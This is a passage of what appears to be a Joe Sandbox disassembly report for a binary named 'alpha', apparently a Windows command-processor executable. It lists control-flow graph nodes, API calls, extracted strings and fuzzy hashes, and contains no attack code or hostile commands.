7ff744f2d541 19709->19712 19713 7ff744f13448 166 API calls 19709->19713 19715 7ff744f1cadf 19709->19715 19719 7ff744f2d3fc 166 API calls 19709->19719 19710->19715 19720 7ff744f2d36c 19711->19720 19712->19704 19712->19706 19714 7ff744f2d546 19712->19714 19718 7ff744f2d589 19712->19718 19713->19709 19714->19703 19714->19706 19716->19711 19718->19703 19718->19704 19719->19709 19721 7ff744f2d3d8 19720->19721 19722 7ff744f2d381 19720->19722 19723 7ff744f134a0 166 API calls 19722->19723 19725 7ff744f2d390 19723->19725 19724 7ff744f13448 166 API calls 19724->19725 19725->19721 19725->19724 19726 7ff744f134a0 166 API calls 19725->19726 19726->19725 19728 7ff744f13448 166 API calls 19727->19728 19729 7ff744f2d33b 19728->19729 19730 7ff744f2d36c 166 API calls 19729->19730 19731 7ff744f2d343 19730->19731 19732 7ff744f2d3fc 166 API calls 19731->19732 
19739 7ff744f2d34e 19732->19739 19733 7ff744f2d555 19737 7ff744f2d31c 166 API calls 19733->19737 19734 7ff744f2d592 19735 7ff744f13448 166 API calls 19734->19735 19738 7ff744f2d5a5 19735->19738 19736 7ff744f2d5c4 19741 7ff744f13448 166 API calls 19736->19741 19745 7ff744f2d5c2 19737->19745 19742 7ff744f2d5ba 19738->19742 19746 7ff744f13448 166 API calls 19738->19746 19739->19733 19739->19734 19739->19736 19740 7ff744f2d541 19739->19740 19743 7ff744f13448 166 API calls 19739->19743 19739->19745 19749 7ff744f2d3fc 166 API calls 19739->19749 19740->19734 19740->19736 19744 7ff744f2d546 19740->19744 19748 7ff744f2d589 19740->19748 19741->19745 19747 7ff744f2d36c 166 API calls 19742->19747 19743->19739 19744->19733 19744->19736 19745->19715 19746->19742 19747->19745 19748->19733 19748->19734 19749->19739 19751 7ff744f0745f 19750->19751 19752 7ff744f07468 19750->19752 19751->19752 19753 7ff744f248c8 _wcsicmp 19751->19753 19754 7ff744f07497 _wcsicmp 19751->19754 19752->19625 19752->19630 19757 7ff744f248ed CreateFileW 19753->19757 19755 7ff744f11ea0 8 API calls 19754->19755 19756 7ff744f074bd 19755->19756 19756->19757 19758 7ff744f074c9 CreateFileW 19756->19758 19757->19758 19759 7ff744f24929 19757->19759 19760 7ff744f07501 _open_osfhandle 19758->19760 19761 7ff744f24943 GetLastError 19758->19761 19759->19760 19760->19752 19762 7ff744f07520 CloseHandle 19760->19762 19761->19752 19762->19752 19764->19633 19768 7ff744f2773c 19765->19768 19766 7ff744f2777d 19766->19684 19767 7ff744f13448 166 API calls 19767->19768 19768->19766 19768->19767 19770 7ff744f2778c 166 API calls 19769->19770 19772 7ff744f276fb 19770->19772 19771 7ff744f2771c 19771->19684 19772->19771 19773 7ff744f13448 166 API calls 19772->19773 19774 7ff744f27711 19773->19774 19775 7ff744f2778c 166 API calls 19774->19775 19775->19771 19777 7ff744f072de 19776->19777 19778 7ff744f24621 19776->19778 19780 7ff744f072eb 19777->19780 19784 7ff744f24467 19777->19784 19785 7ff744f24530 19777->19785 19779 7ff744f247e0 

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                              • String ID: :$:$:$:ON$OFF
                              • API String ID: 972821348-467788257
                              • Opcode ID: ec77655612b2197603e506f96a5fdd07df98b32b07624a2fc81e4f2603e93a28
                              • Instruction ID: e10ee5a522bbb755d48d25c807a506317924d67c08fac7982468edd730a12ed6
                              • Opcode Fuzzy Hash: ec77655612b2197603e506f96a5fdd07df98b32b07624a2fc81e4f2603e93a28
                              • Instruction Fuzzy Hash: 8B227121E0D642C6EB64BF239598279E6A1EF95B81FCD8135CD0E477DDDE3CA840A360

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: InfoLocale$DefaultUsersetlocale
                              • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                              • API String ID: 1351325837-2236139042
                              • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                              • Instruction ID: 20321692938c3197c9f5e0751d63a9c4573fe587406562e17cfcfc786ca07f12
                              • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                              • Instruction Fuzzy Hash: AAF11765B0C642C6EB21BF12E9902B9A6B5BF44B80FD85135CE1D576D8EF3CE905E320

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: QueryValue$CloseOpensrandtime
                              • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                              • API String ID: 145004033-3846321370
                              • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                              • Instruction ID: e2b496c1e0d5a188fab7f3d922bdf882f674ab859588042ab8809fb3fd741c34
                              • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                              • Instruction Fuzzy Hash: 7DE1403251D682C6E750BF12E49057AF7A0FB84745F886135EE8E42A9CDF7CE944EB20

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              APIs
                              • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14D9A
                                • Part of subcall function 00007FF744F158E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF744F2C6DB), ref: 00007FF744F158EF
                              • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14DBB
                              • _get_osfhandle.MSVCRT ref: 00007FF744F14DCA
                              • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14DE0
                              • _get_osfhandle.MSVCRT ref: 00007FF744F14DEE
                              • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14E04
                                • Part of subcall function 00007FF744F10580: _get_osfhandle.MSVCRT ref: 00007FF744F10589
                                • Part of subcall function 00007FF744F10580: SetConsoleMode.KERNELBASE ref: 00007FF744F1059E
                                • Part of subcall function 00007FF744F10580: _get_osfhandle.MSVCRT ref: 00007FF744F105AF
                                • Part of subcall function 00007FF744F10580: GetConsoleMode.KERNELBASE ref: 00007FF744F105C5
                                • Part of subcall function 00007FF744F10580: _get_osfhandle.MSVCRT ref: 00007FF744F105EF
                                • Part of subcall function 00007FF744F10580: GetConsoleMode.KERNELBASE ref: 00007FF744F10605
                                • Part of subcall function 00007FF744F10580: _get_osfhandle.MSVCRT ref: 00007FF744F10632
                                • Part of subcall function 00007FF744F10580: SetConsoleMode.KERNELBASE ref: 00007FF744F10647
                                • Part of subcall function 00007FF744F14A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A28
                                • Part of subcall function 00007FF744F14A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A66
                                • Part of subcall function 00007FF744F14A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A7D
                                • Part of subcall function 00007FF744F14A14: memmove.MSVCRT(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A9A
                                • Part of subcall function 00007FF744F14A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14AA2
                                • Part of subcall function 00007FF744F14AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F08798), ref: 00007FF744F14AD6
                                • Part of subcall function 00007FF744F14AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F08798), ref: 00007FF744F14AEF
                                • Part of subcall function 00007FF744F15554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF744F14E35), ref: 00007FF744F155DA
                                • Part of subcall function 00007FF744F15554: RegQueryValueExW.KERNELBASE ref: 00007FF744F15623
                                • Part of subcall function 00007FF744F15554: RegQueryValueExW.KERNELBASE ref: 00007FF744F15667
                                • Part of subcall function 00007FF744F15554: RegQueryValueExW.KERNELBASE ref: 00007FF744F156BE
                                • Part of subcall function 00007FF744F15554: RegQueryValueExW.KERNELBASE ref: 00007FF744F15702
                              • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14E35
                              • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14E81
                              • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14F69
                              • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14F95
                              • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14FB0
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14FC1
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14FD8
                              • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F14FF8
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F15037
                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F1504B
                              • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F150DF
                              • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F150F2
                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F1510F
                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F15130
                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F1514A
                              • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF744F15175
                                • Part of subcall function 00007FF744F13578: _get_osfhandle.MSVCRT ref: 00007FF744F13584
                                • Part of subcall function 00007FF744F13578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F1359C
                                • Part of subcall function 00007FF744F13578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135C3
                                • Part of subcall function 00007FF744F13578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135D9
                                • Part of subcall function 00007FF744F13578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135ED
                                • Part of subcall function 00007FF744F13578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F13602
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                              • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                              • API String ID: 1049357271-3021193919
                              • Opcode ID: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                              • Instruction ID: 03d9aaedc08acfec22c322b50f9be0f3f40846986ccbd84b7925b8d74c3fb341
                              • Opcode Fuzzy Hash: d2460cf6989233a7a4462fbac63f5e4cbe638dcbee7ad3df93fe443bd3d09fd5
                              • Instruction Fuzzy Hash: A4C15D21A0CA42D6EB00BF52A895179E7A0FF89B91FCD9134DD0E477D9DF3CA945A220

                              Control-flow Graph

                              control_flow_graph 509 7ff744f137d8-7ff744f13887 GetCurrentThreadId OpenThread call 7ff744f104f4 HeapSetInformation RegOpenKeyExW 512 7ff744f1e9f8-7ff744f1ea3b RegQueryValueExW RegCloseKey 509->512 513 7ff744f1388d-7ff744f138eb call 7ff744f15920 GetConsoleOutputCP GetCPInfo 509->513 515 7ff744f1ea41-7ff744f1ea59 GetThreadLocale 512->515 513->515 519 7ff744f138f1-7ff744f13913 memset 513->519 517 7ff744f1ea5b-7ff744f1ea67 515->517 518 7ff744f1ea74-7ff744f1ea77 515->518 517->518 522 7ff744f1ea79-7ff744f1ea7d 518->522 523 7ff744f1ea94-7ff744f1ea96 518->523 520 7ff744f13919-7ff744f13935 call 7ff744f14d5c 519->520 521 7ff744f1eaa5 519->521 530 7ff744f1393b-7ff744f13942 520->530 531 7ff744f1eae2-7ff744f1eaff call 7ff744f03240 call 7ff744f28530 call 7ff744f14c1c 520->531 524 7ff744f1eaa8-7ff744f1eab4 521->524 522->523 526 7ff744f1ea7f-7ff744f1ea89 522->526 523->521 524->520 527 7ff744f1eaba-7ff744f1eac3 524->527 526->523 529 7ff744f1eacb-7ff744f1eace 527->529 534 7ff744f1ead0-7ff744f1eadb 529->534 535 7ff744f1eac5-7ff744f1eac9 529->535 532 7ff744f1eb27-7ff744f1eb40 _setjmp 530->532 533 7ff744f13948-7ff744f13962 _setjmp 530->533 538 7ff744f1eb00-7ff744f1eb0d 531->538 539 7ff744f139fe-7ff744f13a05 call 7ff744f14c1c 532->539 540 7ff744f1eb46-7ff744f1eb49 532->540 537 7ff744f13968-7ff744f1396d 533->537 533->538 534->524 541 7ff744f1eadd 534->541 535->529 543 7ff744f139b9-7ff744f139bb 537->543 544 7ff744f1396f 537->544 551 7ff744f1eb15-7ff744f1eb1f call 7ff744f14c1c 538->551 539->512 546 7ff744f1eb4b-7ff744f1eb65 call 7ff744f03240 call 7ff744f28530 call 7ff744f14c1c 540->546 547 7ff744f1eb66-7ff744f1eb6f call 7ff744f101b8 540->547 541->520 554 7ff744f1eb20 543->554 555 7ff744f139c1-7ff744f139c3 call 7ff744f14c1c 543->555 550 7ff744f13972-7ff744f1397d 544->550 546->547 565 7ff744f1eb87-7ff744f1eb89 call 7ff744f186f0 547->565 566 7ff744f1eb71-7ff744f1eb82 _setmode 547->566 558 7ff744f139c9-7ff744f139de call 7ff744f0df60 550->558 559 
7ff744f1397f-7ff744f13984 550->559 551->554 554->532 570 7ff744f139c8 555->570 558->551 576 7ff744f139e4-7ff744f139e8 558->576 559->550 567 7ff744f13986-7ff744f139ae call 7ff744f10580 GetConsoleOutputCP GetCPInfo call 7ff744f104f4 559->567 577 7ff744f1eb8e-7ff744f1ebad call 7ff744f158e4 call 7ff744f0df60 565->577 566->565 586 7ff744f139b3 567->586 570->558 576->539 580 7ff744f139ea-7ff744f139ef call 7ff744f0be00 576->580 590 7ff744f1ebaf-7ff744f1ebb3 577->590 587 7ff744f139f4-7ff744f139fc 580->587 586->543 587->559 590->539 591 7ff744f1ebb9-7ff744f1ec24 call 7ff744f158e4 GetConsoleOutputCP GetCPInfo call 7ff744f104f4 call 7ff744f0be00 call 7ff744f10580 GetConsoleOutputCP GetCPInfo call 7ff744f104f4 590->591 591->577
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                              • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                              • API String ID: 2624720099-1920437939
                              • Opcode ID: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
                              • Instruction ID: d4c3b875bc8dc8eb9766b6721dfbb8eee31440c9fe925ca5db71a0a561b87f74
                              • Opcode Fuzzy Hash: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
                              • Instruction Fuzzy Hash: F1C19E31E0C642CAF714BF6294C55B8EAB1EF49754FCC4139DE4E46ADADE3CA840A720

                              Control-flow Graph

                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                              • Instruction ID: 4d23921d3bf5de036b7fae4249e554dbe89634a06411fb7383989b1f66660b30
                              • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                              • Instruction Fuzzy Hash: 78510A21B0C681C5EB30BF57A5842BAE6A0FB54BA0FCD4231DE6D576D8DF3CE845A210
                              APIs
                              • memset.MSVCRT ref: 00007FF744F07DA1
                                • Part of subcall function 00007FF744F1417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF744F141AD
                                • Part of subcall function 00007FF744F0D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D46E
                                • Part of subcall function 00007FF744F0D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D485
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D4EE
                                • Part of subcall function 00007FF744F0D3F0: iswspace.MSVCRT ref: 00007FF744F0D54D
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D569
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D58C
                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF744F07EB7
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                              • String ID:
                              • API String ID: 168394030-0
                              • Opcode ID: b5165ffa2db6ef7b8d8da3c0ab750a736ff1024e17944bcf39a6df9fca352c0d
                              • Instruction ID: ff0c229c50df02746e2f8114fbc4ecde33d7ca79c5c88c924c1824253a8cdb6a
                              • Opcode Fuzzy Hash: b5165ffa2db6ef7b8d8da3c0ab750a736ff1024e17944bcf39a6df9fca352c0d
                              • Instruction Fuzzy Hash: DAA1D321B1CA42C5FB64FF2798942B9A2A1AF84784FCC4135DE1E476EDDF3CA945A310

                              Control-flow Graph

                              control_flow_graph 420 7ff744f13c24-7ff744f13c61 421 7ff744f13c67-7ff744f13c99 call 7ff744f0af14 call 7ff744f0ca40 420->421 422 7ff744f1ec5a-7ff744f1ec5f 420->422 431 7ff744f1ec97-7ff744f1eca1 call 7ff744f1855c 421->431 432 7ff744f13c9f-7ff744f13cb2 call 7ff744f0b900 421->432 422->421 424 7ff744f1ec65-7ff744f1ec6a 422->424 426 7ff744f1412e-7ff744f1415b call 7ff744f18f80 424->426 432->431 437 7ff744f13cb8-7ff744f13cbc 432->437 438 7ff744f13cbf-7ff744f13cc7 437->438 438->438 439 7ff744f13cc9-7ff744f13ccd 438->439 440 7ff744f13cd2-7ff744f13cd8 439->440 441 7ff744f13cda-7ff744f13cdf 440->441 442 7ff744f13ce5-7ff744f13d62 GetCurrentDirectoryW towupper iswalpha 440->442 441->442 443 7ff744f13faa-7ff744f13fb3 441->443 444 7ff744f13fb8 442->444 445 7ff744f13d68-7ff744f13d6c 442->445 443->440 447 7ff744f13fc6-7ff744f13fec GetLastError call 7ff744f1855c call 7ff744f1a5d6 444->447 445->444 446 7ff744f13d72-7ff744f13dcd towupper GetFullPathNameW 445->446 446->447 448 7ff744f13dd3-7ff744f13ddd 446->448 450 7ff744f13ff1-7ff744f14007 call 7ff744f1855c _local_unwind 447->450 448->450 451 7ff744f13de3-7ff744f13dfb 448->451 461 7ff744f1400c-7ff744f14022 GetLastError 450->461 453 7ff744f140fe-7ff744f14119 call 7ff744f1855c _local_unwind 451->453 454 7ff744f13e01-7ff744f13e11 451->454 463 7ff744f1411a-7ff744f1412c call 7ff744f0ff70 call 7ff744f1855c 453->463 454->453 457 7ff744f13e17-7ff744f13e28 454->457 460 7ff744f13e2c-7ff744f13e34 457->460 460->460 464 7ff744f13e36-7ff744f13e3f 460->464 465 7ff744f14028-7ff744f1402b 461->465 466 7ff744f13e95-7ff744f13e9c 461->466 463->426 468 7ff744f13e42-7ff744f13e55 464->468 465->466 469 7ff744f14031-7ff744f14047 call 7ff744f1855c _local_unwind 465->469 470 7ff744f13e9e-7ff744f13ec2 call 7ff744f12978 466->470 471 7ff744f13ecf-7ff744f13ed3 466->471 475 7ff744f13e57-7ff744f13e60 468->475 476 7ff744f13e66-7ff744f13e8f GetFileAttributesW 468->476 487 7ff744f1404c-7ff744f14062 call 7ff744f1855c _local_unwind 469->487 479 
7ff744f13ec7-7ff744f13ec9 470->479 473 7ff744f13f08-7ff744f13f0b 471->473 474 7ff744f13ed5-7ff744f13ef7 GetFileAttributesW 471->474 483 7ff744f13f0d-7ff744f13f11 473->483 484 7ff744f13f1e-7ff744f13f40 SetCurrentDirectoryW 473->484 481 7ff744f14067-7ff744f14098 GetLastError call 7ff744f1855c _local_unwind 474->481 482 7ff744f13efd-7ff744f13f02 474->482 475->476 485 7ff744f13f9d-7ff744f13fa5 475->485 476->461 476->466 479->471 479->487 490 7ff744f1409d-7ff744f140b3 call 7ff744f1855c _local_unwind 481->490 482->473 482->490 491 7ff744f13f13-7ff744f13f1c 483->491 492 7ff744f13f46-7ff744f13f69 call 7ff744f1498c 483->492 484->492 493 7ff744f140b8-7ff744f140de GetLastError call 7ff744f1855c _local_unwind 484->493 485->468 487->481 490->493 491->484 491->492 503 7ff744f140e3-7ff744f140f9 call 7ff744f1855c _local_unwind 492->503 504 7ff744f13f6f-7ff744f13f98 call 7ff744f1417c 492->504 493->503 503->453 504->463
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
